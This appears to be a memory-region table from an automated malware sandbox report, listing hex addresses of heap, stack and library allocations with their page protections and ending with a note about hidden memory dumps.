page read and write
|
||
|
27B9BFCC000
|
heap
|
page read and write
|
||
|
27B9DE13000
|
heap
|
page read and write
|
||
|
27B9DCBC000
|
heap
|
page read and write
|
||
|
27B9DCD0000
|
heap
|
page read and write
|
||
|
27B9DCCA000
|
heap
|
page read and write
|
||
|
27B9DE3C000
|
heap
|
page read and write
|
||
|
6E1E000
|
stack
|
page read and write
|
||
|
4677000
|
heap
|
page read and write
|
||
|
27B9DE2E000
|
heap
|
page read and write
|
||
|
27B9DCA0000
|
heap
|
page read and write
|
||
|
8080000
|
trusted library allocation
|
page read and write
|
||
|
44D0000
|
trusted library allocation
|
page read and write
|
||
|
27B9DDA0000
|
heap
|
page read and write
|
||
|
27B9DE02000
|
heap
|
page read and write
|
||
|
44A3000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B86D000
|
trusted library allocation
|
page execute and read and write
|
||
|
2BC7000
|
heap
|
page read and write
|
||
|
27B9BFBE000
|
heap
|
page read and write
|
||
|
463E000
|
stack
|
page read and write
|
||
|
9AEECFE000
|
stack
|
page read and write
|
||
|
7210000
|
heap
|
page read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page execute and read and write
|
||
|
200D0000
|
direct allocation
|
page read and write
|
||
|
20A6C000
|
stack
|
page read and write
|
||
|
6C00000
|
direct allocation
|
page read and write
|
||
|
1E3BE680000
|
trusted library allocation
|
page read and write
|
||
|
208B0000
|
direct allocation
|
page read and write
|
||
|
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
|
2A8E000
|
stack
|
page read and write
|
||
|
7FFD9BBA0000
|
trusted library allocation
|
page read and write
|
||
|
5070000
|
heap
|
page read and write
|
||
|
1E3D86A0000
|
heap
|
page read and write
|
||
|
27B9DE20000
|
heap
|
page read and write
|
||
|
662140E000
|
stack
|
page read and write
|
||
|
27B9DCDF000
|
heap
|
page read and write
|
||
|
7FFD9B860000
|
trusted library allocation
|
page read and write
|
||
|
27B9DCC2000
|
heap
|
page read and write
|
||
|
8F30000
|
direct allocation
|
page execute and read and write
|
||
|
27B9DE7F000
|
heap
|
page read and write
|
||
|
27B9DDC6000
|
heap
|
page read and write
|
||
|
23BD000
|
stack
|
page read and write
|
||
|
8600000
|
trusted library allocation
|
page execute and read and write
|
||
|
228E59D0000
|
heap
|
page read and write
|
||
|
662158B000
|
stack
|
page read and write
|
||
|
2AAE000
|
stack
|
page read and write
|
||
|
9AEEFFE000
|
stack
|
page read and write
|
||
|
1E3C0350000
|
heap
|
page execute and read and write
|
||
|
50D8000
|
heap
|
page read and write
|
||
|
1E3C0981000
|
trusted library allocation
|
page read and write
|
||
|
27B9BF29000
|
heap
|
page read and write
|
||
|
27B9DE62000
|
heap
|
page read and write
|
||
|
7FFD9B862000
|
trusted library allocation
|
page read and write
|
||
|
4750000
|
heap
|
page execute and read and write
|
||
|
27B9BFB9000
|
heap
|
page read and write
|
||
|
85E0000
|
trusted library allocation
|
page read and write
|
||
|
27B9BFCC000
|
heap
|
page read and write
|
||
|
2060E000
|
stack
|
page read and write
|
||
|
20BEC000
|
stack
|
page read and write
|
||
|
85D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB00000
|
trusted library allocation
|
page read and write
|
||
|
4F80000
|
heap
|
page read and write
|
||
|
1E3BE6A0000
|
trusted library allocation
|
page read and write
|
||
|
75A0000
|
trusted library allocation
|
page read and write
|
||
|
20B2F000
|
stack
|
page read and write
|
||
|
46BE000
|
stack
|
page read and write
|
||
|
1E3BE721000
|
heap
|
page read and write
|
||
|
2730000
|
heap
|
page read and write
|
||
|
27B9DE97000
|
heap
|
page read and write
|
||
|
27B9DF6B000
|
heap
|
page read and write
|
||
|
27B9DF5D000
|
heap
|
page read and write
|
||
|
1E3BE741000
|
heap
|
page read and write
|
||
|
7FFD9BA20000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D70000
|
heap
|
page read and write
|
||
|
736A000
|
trusted library allocation
|
page read and write
|
||
|
27B9DCC0000
|
heap
|
page read and write
|
||
|
27B9BF3D000
|
heap
|
page read and write
|
||
|
27B9DCAA000
|
heap
|
page read and write
|
||
|
27B9DE4A000
|
heap
|
page read and write
|
||
|
46FF000
|
stack
|
page read and write
|
||
|
27B9DCF2000
|
heap
|
page read and write
|
||
|
27B9BFDC000
|
heap
|
page read and write
|
||
|
84CB000
|
stack
|
page read and write
|
||
|
7F90000
|
trusted library allocation
|
page read and write
|
||
|
2AC0000
|
heap
|
page read and write
|
||
|
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
|
27B9DCCC000
|
heap
|
page read and write
|
||
|
7F77000
|
stack
|
page read and write
|
||
|
2058D000
|
stack
|
page read and write
|
||
|
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
|
2095F000
|
stack
|
page read and write
|
||
|
27B9DE2E000
|
heap
|
page read and write
|
||
|
209AE000
|
stack
|
page read and write
|
||
|
6D9D000
|
stack
|
page read and write
|
||
|
27B9D860000
|
heap
|
page read and write
|
||
|
27B9DE62000
|
heap
|
page read and write
|
||
|
27B9DE74000
|
heap
|
page read and write
|
||
|
27B9DCEF000
|
heap
|
page read and write
|
||
|
27B9DCAF000
|
heap
|
page read and write
|
||
|
27B9BFAD000
|
heap
|
page read and write
|
||
|
7302000
|
heap
|
page read and write
|
||
|
44D2000
|
trusted library allocation
|
page read and write
|
||
|
9A92000
|
direct allocation
|
page execute and read and write
|
||
|
2CE9000
|
heap
|
page read and write
|
||
|
27B9E08A000
|
heap
|
page read and write
|
||
|
66209BE000
|
stack
|
page read and write
|
||
|
4670000
|
heap
|
page read and write
|
||
|
7340000
|
trusted library allocation
|
page read and write
|
||
|
473E000
|
stack
|
page read and write
|
||
|
27B9DE02000
|
heap
|
page read and write
|
||
|
27B9DF25000
|
heap
|
page read and write
|
||
|
27B9DEC4000
|
heap
|
page read and write
|
||
|
27B9BFA7000
|
heap
|
page read and write
|
||
|
1E3BE6B0000
|
heap
|
page read and write
|
||
|
27B9BFD0000
|
heap
|
page read and write
|
||
|
4800000
|
heap
|
page execute and read and write
|
||
|
208D0000
|
direct allocation
|
page read and write
|
||
|
7FA0000
|
trusted library allocation
|
page read and write
|
||
|
27B9BF3D000
|
heap
|
page read and write
|
||
|
44A4000
|
trusted library allocation
|
page read and write
|
||
|
96124FE000
|
unkown
|
page read and write
|
||
|
2CD0000
|
trusted library section
|
page read and write
|
||
|
27B9DE43000
|
heap
|
page read and write
|
||
|
25D0000
|
heap
|
page read and write
|
||
|
73EE000
|
stack
|
page read and write
|
||
|
27B9DCAE000
|
heap
|
page read and write
|
||
|
800E000
|
stack
|
page read and write
|
||
|
44CA000
|
trusted library allocation
|
page execute and read and write
|
||
|
27B9BFC9000
|
heap
|
page read and write
|
||
|
1E3D0370000
|
trusted library allocation
|
page read and write
|
||
|
205CD000
|
stack
|
page read and write
|
||
|
7FFD9BB50000
|
trusted library allocation
|
page read and write
|
||
|
844C000
|
stack
|
page read and write
|
||
|
1E3C0130000
|
heap
|
page execute and read and write
|
||
|
8320000
|
trusted library allocation
|
page read and write
|
||
|
858E000
|
stack
|
page read and write
|
||
|
7560000
|
heap
|
page read and write
|
||
|
27B9BEA0000
|
heap
|
page read and write
|
||
|
27B9BFCC000
|
heap
|
page read and write
|
||
|
6620A3B000
|
stack
|
page read and write
|
||
|
20AAC000
|
stack
|
page read and write
|
||
|
27B9DCB4000
|
heap
|
page read and write
|
||
|
27B9DCB5000
|
heap
|
page read and write
|
||
|
27B9DCD1000
|
heap
|
page read and write
|
||
|
27B9DE0F000
|
heap
|
page read and write
|
||
|
251D000
|
stack
|
page read and write
|
||
|
27B9DEE1000
|
heap
|
page read and write
|
||
|
204D0000
|
heap
|
page read and write
|
||
|
80D5000
|
heap
|
page read and write
|
||
|
27B9DF5D000
|
heap
|
page read and write
|
||
|
4870000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B91C000
|
trusted library allocation
|
page execute and read and write
|
||
|
27B9DCAD000
|
heap
|
page read and write
|
||
|
20B6B000
|
stack
|
page read and write
|
||
|
27B9BF3D000
|
heap
|
page read and write
|
||
|
50D0000
|
heap
|
page read and write
|
||
|
709E000
|
stack
|
page read and write
|
||
|
1E3C0B19000
|
trusted library allocation
|
page read and write
|
||
|
27B9DCA1000
|
heap
|
page read and write
|
||
|
27B9DF1A000
|
heap
|
page read and write
|
||
|
9AEF0FB000
|
stack
|
page read and write
|
||
|
27B9DE62000
|
heap
|
page read and write
|
||
|
228E59F0000
|
heap
|
page read and write
|
||
|
7370000
|
trusted library allocation
|
page read and write
|
||
|
27B9BFAF000
|
heap
|
page read and write
|
||
|
27B9DE86000
|
heap
|
page read and write
|
||
|
27B9BF00000
|
heap
|
page read and write
|
||
|
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
|
82F5000
|
trusted library allocation
|
page read and write
|
||
|
1E3D89CD000
|
heap
|
page read and write
|
||
|
2E7D000
|
stack
|
page read and write
|
||
|
27B9DCFF000
|
heap
|
page read and write
|
||
|
27B9DEF9000
|
heap
|
page read and write
|
||
|
27B9BDC0000
|
heap
|
page read and write
|
||
|
1E3C20AD000
|
trusted library allocation
|
page read and write
|
||
|
208A0000
|
direct allocation
|
page read and write
|
||
|
27B9DE17000
|
heap
|
page read and write
|
||
|
27B9DEE8000
|
heap
|
page read and write
|
||
|
1E3D8C60000
|
heap
|
page read and write
|
||
|
27B9DE02000
|
heap
|
page read and write
|
||
|
208C0000
|
direct allocation
|
page read and write
|
||
|
27B9DE1D000
|
heap
|
page read and write
|
||
|
27B9DCA5000
|
heap
|
page read and write
|
||
|
2B95000
|
heap
|
page read and write
|
||
|
45A8000
|
trusted library allocation
|
page read and write
|
||
|
27B9BFBD000
|
heap
|
page read and write
|
||
|
2A3D000
|
stack
|
page read and write
|
||
|
20130000
|
direct allocation
|
page read and write
|
||
|
80DD000
|
heap
|
page read and write
|
||
|
806F000
|
stack
|
page read and write
|
||
|
27B9DCB2000
|
heap
|
page read and write
|
||
|
27B9DDBF000
|
heap
|
page read and write
|
||
|
27B9DF56000
|
heap
|
page read and write
|
||
|
20160000
|
direct allocation
|
page read and write
|
||
|
27B9DE91000
|
heap
|
page read and write
|
||
|
85F0000
|
trusted library allocation
|
page read and write
|
||
|
1E3C1F9C000
|
trusted library allocation
|
page read and write
|
||
|
1E3C0150000
|
heap
|
page read and write
|
||
|
44B9000
|
trusted library allocation
|
page read and write
|
||
|
20110000
|
direct allocation
|
page read and write
|
||
|
27B9DCB9000
|
heap
|
page read and write
|
||
|
7FFD9B916000
|
trusted library allocation
|
page read and write
|
||
|
72F6000
|
heap
|
page read and write
|
||
|
662093E000
|
stack
|
page read and write
|
||
|
7580000
|
trusted library allocation
|
page read and write
|
||
|
7590000
|
trusted library allocation
|
page read and write
|
||
|
1E3D8742000
|
heap
|
page read and write
|
||
|
27B9DD0C000
|
heap
|
page read and write
|
||
|
27B9DCBA000
|
heap
|
page read and write
|
||
|
25DD000
|
stack
|
page read and write
|
||
|
27B9DED3000
|
heap
|
page read and write
|
||
|
5131000
|
heap
|
page read and write
|
||
|
27B9DE87000
|
heap
|
page read and write
|
||
|
71F8000
|
trusted library allocation
|
page read and write
|
||
|
27B9DCD0000
|
heap
|
page read and write
|
||
|
27B9DE74000
|
heap
|
page read and write
|
||
|
2EBE000
|
stack
|
page read and write
|
||
|
28FD000
|
stack
|
page read and write
|
||
|
6BE0000
|
direct allocation
|
page read and write
|
||
|
20080000
|
direct allocation
|
page read and write
|
||
|
27B9DEF5000
|
heap
|
page read and write
|
||
|
1E3D064A000
|
trusted library allocation
|
page read and write
|
||
|
27B9DF66000
|
heap
|
page read and write
|
||
|
2780000
|
heap
|
page read and write
|
||
|
1E3BE733000
|
heap
|
page read and write
|
||
|
7FFD9B864000
|
trusted library allocation
|
page read and write
|
||
|
1E3C1FB8000
|
trusted library allocation
|
page read and write
|
||
|
209EF000
|
stack
|
page read and write
|
||
|
2BB0000
|
heap
|
page read and write
|
||
|
80CD000
|
heap
|
page read and write
|
||
|
27B9DE2E000
|
heap
|
page read and write
|
||
|
27B9DF49000
|
heap
|
page read and write
|
||
|
4E80000
|
heap
|
page read and write
|
||
|
66208BE000
|
stack
|
page read and write
|
||
|
27B9DE86000
|
heap
|
page read and write
|
||
|
1E3C0B30000
|
trusted library allocation
|
page read and write
|
||
|
27B9DE3D000
|
heap
|
page read and write
|
||
|
27B9BFCC000
|
heap
|
page read and write
|
||
|
1E3C0B07000
|
trusted library allocation
|
page read and write
|
||
|
27B9DE13000
|
heap
|
page read and write
|
||
|
27B9DE13000
|
heap
|
page read and write
|
||
|
6D1D000
|
stack
|
page read and write
|
||
|
2C70000
|
heap
|
page read and write
|
||
|
7FFD9BB10000
|
trusted library allocation
|
page read and write
|
||
|
9AEF2FF000
|
stack
|
page read and write
|
||
|
7570000
|
trusted library allocation
|
page read and write
|
||
|
27B9DE4A000
|
heap
|
page read and write
|
||
|
662047E000
|
stack
|
page read and write
|
||
|
200E0000
|
direct allocation
|
page read and write
|
||
|
27B9DE65000
|
heap
|
page read and write
|
||
|
27B9DF6C000
|
heap
|
page read and write
|
||
|
27B9DE80000
|
heap
|
page read and write
|
||
|
9AEF4FB000
|
stack
|
page read and write
|
||
|
1E3BFFB0000
|
trusted library allocation
|
page read and write
|
||
|
27B9BF3B000
|
heap
|
page read and write
|
||
|
27B9E084000
|
heap
|
page read and write
|
||
|
27B9DCA4000
|
heap
|
page read and write
|
||
|
72EA000
|
heap
|
page read and write
|
||
|
8020000
|
heap
|
page read and write
|
||
|
6C70000
|
direct allocation
|
page read and write
|
||
|
2B94000
|
heap
|
page read and write
|
||
|
746E000
|
stack
|
page read and write
|
||
|
8090000
|
heap
|
page read and write
|
||
|
27B9DCF7000
|
heap
|
page read and write
|
||
|
27B9DE7C000
|
heap
|
page read and write
|
||
|
2B92000
|
heap
|
page read and write
|
||
|
27B9DE1D000
|
heap
|
page read and write
|
||
|
8310000
|
trusted library allocation
|
page execute and read and write
|
||
|
27B9D840000
|
remote allocation
|
page read and write
|
||
|
80C3000
|
heap
|
page read and write
|
||
|
2B5B000
|
heap
|
page read and write
|
||
|
27B9DE82000
|
heap
|
page read and write
|
||
|
1E3C0B45000
|
trusted library allocation
|
page read and write
|
||
|
27B9DF5D000
|
heap
|
page read and write
|
||
|
27B9DFEF000
|
heap
|
page read and write
|
||
|
27B9DE77000
|
heap
|
page read and write
|
||
|
4964000
|
trusted library allocation
|
page read and write
|
||
|
2B7B000
|
heap
|
page read and write
|
||
|
7FFD9B920000
|
trusted library allocation
|
page execute and read and write
|
||
|
7310000
|
trusted library allocation
|
page read and write
|
||
|
7380000
|
trusted library allocation
|
page read and write
|
||
|
74D0000
|
trusted library allocation
|
page read and write
|
||
|
27B9DDDB000
|
heap
|
page read and write
|
||
|
27B9DCD7000
|
heap
|
page read and write
|
||
|
27B9DD02000
|
heap
|
page read and write
|
||
|
8070000
|
trusted library allocation
|
page execute and read and write
|
||
|
20CAE000
|
stack
|
page read and write
|
||
|
27B9DD08000
|
heap
|
page read and write
|
||
|
1E3D897F000
|
heap
|
page read and write
|
||
|
27CE000
|
stack
|
page read and write
|
||
|
44A0000
|
trusted library allocation
|
page read and write
|
||
|
27D0000
|
heap
|
page read and write
|
||
|
27B9BF09000
|
heap
|
page read and write
|
||
|
27B9DE3D000
|
heap
|
page read and write
|
||
|
6B8E000
|
stack
|
page read and write
|
||
|
742E000
|
stack
|
page read and write
|
||
|
85CD000
|
stack
|
page read and write
|
||
|
27B9E07E000
|
heap
|
page read and write
|
||
|
7F6F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B870000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA30000
|
trusted library allocation
|
page execute and read and write
|
||
|
27B9DF5B000
|
heap
|
page read and write
|
||
|
27B9DE31000
|
heap
|
page read and write
|
||
|
228E59FB000
|
heap
|
page read and write
|
||
|
6C60000
|
direct allocation
|
page read and write
|
||
|
27B9DE82000
|
heap
|
page read and write
|
||
|
1E3C0826000
|
trusted library allocation
|
page read and write
|
||
|
662150B000
|
stack
|
page read and write
|
||
|
74E0000
|
trusted library allocation
|
page read and write
|
||
|
27B9DE3D000
|
heap
|
page read and write
|
||
|
255D000
|
stack
|
page read and write
|
||
|
2CC0000
|
trusted library section
|
page read and write
|
||
|
228E5B10000
|
heap
|
page read and write
|
||
|
27B9DE3D000
|
heap
|
page read and write
|
||
|
661FFD3000
|
stack
|
page read and write
|
||
|
7FFD9B863000
|
trusted library allocation
|
page execute and read and write
|
||
|
662037F000
|
stack
|
page read and write
|
||
|
7500000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAF0000
|
trusted library allocation
|
page read and write
|
||
|
80D9000
|
heap
|
page read and write
|
||
|
27B9DE2E000
|
heap
|
page read and write
|
||
|
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
|
6C90000
|
direct allocation
|
page read and write
|
||
|
1E3BE725000
|
heap
|
page read and write
|
||
|
27B9DCC5000
|
heap
|
page read and write
|
||
|
1E3D8847000
|
heap
|
page execute and read and write
|
||
|
1E3BE5E0000
|
heap
|
page read and write
|
||
|
27B9DE41000
|
heap
|
page read and write
|
||
|
27B9BFE3000
|
heap
|
page read and write
|
||
|
27B9BFDC000
|
heap
|
page read and write
|
||
|
2970000
|
heap
|
page read and write
|
||
|
7FFD9BB70000
|
trusted library allocation
|
page read and write
|
||
|
75EB000
|
stack
|
page read and write
|
||
|
27B9DF66000
|
heap
|
page read and write
|
||
|
200F0000
|
direct allocation
|
page read and write
|
||
|
2ACA000
|
heap
|
page read and write
|
||
|
27B9DEF8000
|
heap
|
page read and write
|
||
|
7FFD9BB20000
|
trusted library allocation
|
page read and write
|
||
|
74AD000
|
stack
|
page read and write
|
||
|
27B9DE4A000
|
heap
|
page read and write
|
||
|
27B9DE7F000
|
heap
|
page read and write
|
||
|
27B9DE38000
|
heap
|
page read and write
|
||
|
27B9BFB6000
|
heap
|
page read and write
|
||
|
27B9BFCF000
|
heap
|
page read and write
|
||
|
7550000
|
trusted library allocation
|
page read and write
|
||
|
854C000
|
stack
|
page read and write
|
||
|
2709000
|
stack
|
page read and write
|
||
|
7102000
|
heap
|
page read and write
|
||
|
7291000
|
heap
|
page read and write
|
||
|
5811000
|
trusted library allocation
|
page read and write
|
||
|
27B9DE43000
|
heap
|
page read and write
|
||
|
4650000
|
trusted library allocation
|
page read and write
|
||
|
6C10000
|
direct allocation
|
page read and write
|
||
|
7360000
|
trusted library allocation
|
page read and write
|
||
|
1E3D86E2000
|
heap
|
page read and write
|
||
|
5877000
|
trusted library allocation
|
page read and write
|
||
|
27B9C040000
|
heap
|
page read and write
|
||
|
27B9BFE3000
|
heap
|
page read and write
|
||
|
27B9DE82000
|
heap
|
page read and write
|
||
|
27B9DE63000
|
heap
|
page read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E3C0154000
|
heap
|
page read and write
|
||
|
5175000
|
heap
|
page read and write
|
||
|
27B9DDC7000
|
heap
|
page read and write
|
||
|
7FFD9BAC0000
|
trusted library allocation
|
page read and write
|
||
|
27B9DCD1000
|
heap
|
page read and write
|
||
|
80E1000
|
heap
|
page read and write
|
||
|
27B9DF5B000
|
heap
|
page read and write
|
||
|
1E3BE72D000
|
heap
|
page read and write
|
||
|
44AD000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A4F000
|
unkown
|
page read and write
|
||
|
1E3BE76F000
|
heap
|
page read and write
|
||
|
7FFD9B910000
|
trusted library allocation
|
page read and write
|
||
|
27B9DE75000
|
heap
|
page read and write
|
||
|
27B9DE86000
|
heap
|
page read and write
|
||
|
6D5A000
|
stack
|
page read and write
|
||
|
1E3BE6C0000
|
heap
|
page readonly
|
||
|
599C000
|
trusted library allocation
|
page read and write
|
||
|
71F0000
|
trusted library allocation
|
page read and write
|
||
|
1E3C00E0000
|
heap
|
page read and write
|
||
|
27B9DCCD000
|
heap
|
page read and write
|
||
|
20D30000
|
heap
|
page read and write
|
||
|
2940000
|
heap
|
page read and write
|
||
|
27B9DE62000
|
heap
|
page read and write
|
||
|
6C50000
|
direct allocation
|
page read and write
|
||
|
27B9BFCC000
|
heap
|
page read and write
|
||
|
2AFC000
|
heap
|
page read and write
|
||
|
27B9DEF9000
|
heap
|
page read and write
|
||
|
7530000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAD0000
|
trusted library allocation
|
page read and write
|
||
|
228E5AF0000
|
heap
|
page read and write
|
||
|
80A0000
|
heap
|
page read and write
|
||
|
662027E000
|
stack
|
page read and write
|
||
|
9AEEBFE000
|
stack
|
page read and write
|
||
|
6BF0000
|
direct allocation
|
page read and write
|
||
|
9AEF1FC000
|
stack
|
page read and write
|
||
|
479E000
|
stack
|
page read and write
|
||
|
70DF000
|
stack
|
page read and write
|
||
|
1E3BE640000
|
heap
|
page read and write
|
||
|
27B9DE87000
|
heap
|
page read and write
|
||
|
66202BF000
|
stack
|
page read and write
|
||
|
4540000
|
heap
|
page readonly
|
||
|
44D5000
|
trusted library allocation
|
page execute and read and write
|
||
|
7F80000
|
trusted library allocation
|
page execute and read and write
|
||
|
27B9DCA2000
|
heap
|
page read and write
|
||
|
7FFD9BB80000
|
trusted library allocation
|
page read and write
|
||
|
1E3C16F9000
|
trusted library allocation
|
page read and write
|
||
|
27B9DCE2000
|
heap
|
page read and write
|
||
|
9AEEEFF000
|
stack
|
page read and write
|
||
|
50B0000
|
direct allocation
|
page read and write
|
||
|
1E3D898A000
|
heap
|
page read and write
|
||
|
27B9BFD2000
|
heap
|
page read and write
|
||
|
66203FD000
|
stack
|
page read and write
|
||
|
8107000
|
heap
|
page read and write
|
||
|
27B9E07E000
|
heap
|
page read and write
|
||
|
74B0000
|
trusted library allocation
|
page read and write
|
||
|
27B9BFDD000
|
heap
|
page read and write
|
||
|
27B9E160000
|
heap
|
page read and write
|
||
|
27B9DDA1000
|
heap
|
page read and write
|
||
|
228E59C0000
|
heap
|
page read and write
|
||
|
73A0000
|
heap
|
page execute and read and write
|
||
|
453E000
|
stack
|
page read and write
|
||
|
27B9DED5000
|
heap
|
page read and write
|
||
|
27B9DE62000
|
heap
|
page read and write
|
||
|
1E3D89BB000
|
heap
|
page read and write
|
||
|
1E3D8950000
|
heap
|
page read and write
|
||
|
2B8F000
|
stack
|
page read and write
|
||
|
96125FF000
|
stack
|
page read and write
|
||
|
27B9E088000
|
heap
|
page read and write
|
||
|
27B9DD0C000
|
heap
|
page read and write
|
||
|
6E60000
|
heap
|
page read and write
|
||
|
4490000
|
trusted library allocation
|
page read and write
|
||
|
1E3D8774000
|
heap
|
page read and write
|
||
|
4CB2000
|
remote allocation
|
page execute and read and write
|
||
|
2CBE000
|
stack
|
page read and write
|
||
|
26FD000
|
stack
|
page read and write
|
||
|
27B9DE43000
|
heap
|
page read and write
|
||
|
27B9DCDA000
|
heap
|
page read and write
|
||
|
27B9DF5B000
|
heap
|
page read and write
|
||
|
2B50000
|
heap
|
page read and write
|
||
|
27B9DEF5000
|
heap
|
page read and write
|
||
|
27B9DE1D000
|
heap
|
page read and write
|
||
|
27B9DEF4000
|
heap
|
page read and write
|
||
|
8620000
|
trusted library allocation
|
page read and write
|
||
|
20120000
|
direct allocation
|
page read and write
|
||
|
1E3C1545000
|
trusted library allocation
|
page read and write
|
||
|
27B9DE4A000
|
heap
|
page read and write
|
||
|
5080000
|
heap
|
page read and write
|
||
|
27B9E07E000
|
heap
|
page read and write
|
||
|
7FFD9BB60000
|
trusted library allocation
|
page read and write
|
||
|
27B9DFC4000
|
heap
|
page read and write
|
||
|
27B9BFCC000
|
heap
|
page read and write
|
||
|
4F65000
|
heap
|
page read and write
|
||
|
20BAE000
|
stack
|
page read and write
|
||
|
1E3C03E1000
|
trusted library allocation
|
page read and write
|
||
|
27B9DDB3000
|
heap
|
page read and write
|
||
|
2AEF000
|
heap
|
page read and write
|
||
|
27B9DEE0000
|
heap
|
page read and write
|
||
|
721E000
|
heap
|
page read and write
|
||
|
27B9DF74000
|
heap
|
page read and write
|
||
|
27B9BFE3000
|
heap
|
page read and write
|
||
|
1E3C07CC000
|
trusted library allocation
|
page read and write
|
||
|
44B0000
|
trusted library allocation
|
page read and write
|
||
|
72A6000
|
heap
|
page read and write
|
||
|
2ABF000
|
stack
|
page read and write
|
||
|
2B9B000
|
heap
|
page read and write
|
||
|
1E3D876C000
|
heap
|
page read and write
|
||
|
27B9DEE9000
|
heap
|
page read and write
|
||
|
27B9BFC2000
|
heap
|
page read and write
|
||
|
7DF43B090000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A7E000
|
stack
|
page read and write
|
||
|
27B9DEF9000
|
heap
|
page read and write
|
||
|
66204FE000
|
stack
|
page read and write
|
||
|
20170000
|
direct allocation
|
page read and write
|
||
|
1E3BE500000
|
heap
|
page read and write
|
||
|
27B9C045000
|
heap
|
page read and write
|
||
|
5173000
|
trusted library allocation
|
page read and write
|
||
|
2B6F000
|
unkown
|
page read and write
|
||
|
27B9DCA4000
|
heap
|
page read and write
|
||
|
27B9DEF9000
|
heap
|
page read and write
|
||
|
26CC000
|
stack
|
page read and write
|
||
|
1E3BE600000
|
heap
|
page read and write
|
||
|
5177000
|
heap
|
page read and write
|
||
|
27B9DE1D000
|
heap
|
page read and write
|
||
|
1E3C2193000
|
trusted library allocation
|
page read and write
|
||
|
27B9E07E000
|
heap
|
page read and write
|
||
|
27B9DCFA000
|
heap
|
page read and write
|
||
|
27B9DE3D000
|
heap
|
page read and write
|
||
|
2B56000
|
heap
|
page read and write
|
||
|
27B9DE82000
|
heap
|
page read and write
|
||
|
4550000
|
heap
|
page read and write
|
||
|
200C0000
|
direct allocation
|
page read and write
|
||
|
296F000
|
stack
|
page read and write
|
||
|
27B9DE1F000
|
heap
|
page read and write
|
||
|
27B9BFAB000
|
heap
|
page read and write
|
||
|
27B9BFE3000
|
heap
|
page read and write
|
||
|
1E3D0381000
|
trusted library allocation
|
page read and write
|
||
|
27B9DEA4000
|
heap
|
page read and write
|
||
|
27B9DE76000
|
heap
|
page read and write
|
||
|
27B9DE13000
|
heap
|
page read and write
|
||
|
27B9DE82000
|
heap
|
page read and write
|
||
|
4F60000
|
heap
|
page read and write
|
||
|
27B9DEF9000
|
heap
|
page read and write
|
||
|
27B9DEEC000
|
heap
|
page read and write
|
||
|
2BC0000
|
heap
|
page read and write
|
||
|
1E3BFFB2000
|
trusted library allocation
|
page read and write
|
||
|
59A2000
|
trusted library allocation
|
page read and write
|
||
|
6C80000
|
direct allocation
|
page read and write
|
||
|
7347000
|
trusted library allocation
|
page read and write
|
||
|
1E3D0361000
|
trusted library allocation
|
page read and write
|
||
|
2720000
|
heap
|
page read and write
|
||
|
20C2E000
|
stack
|
page read and write
|
||
|
961213D000
|
stack
|
page read and write
|
||
|
27B9BF2F000
|
heap
|
page read and write
|
||
|
27B9DF73000
|
heap
|
page read and write
|
||
|
662057E000
|
stack
|
page read and write
|
||
|
27B9DCB5000
|
heap
|
page read and write
|
||
|
27B9DE2E000
|
heap
|
page read and write
|
||
|
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
|
1E3BFF80000
|
trusted library allocation
|
page read and write
|
||
|
27B9DE5D000
|
heap
|
page read and write
|
There are 660 hidden memdumps, click here to show them.